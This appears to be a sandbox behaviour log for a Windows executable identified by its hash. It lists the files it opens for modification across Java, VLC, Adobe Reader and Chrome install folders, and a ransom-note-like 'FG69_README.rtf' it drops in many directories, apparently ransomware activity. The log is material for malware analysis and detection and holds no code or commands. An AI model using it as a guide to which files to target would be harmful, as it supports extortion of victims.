d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\84.0.4147.89_chrome_installer.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\PopConvertFrom.docx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\README.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\LICENSE d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok 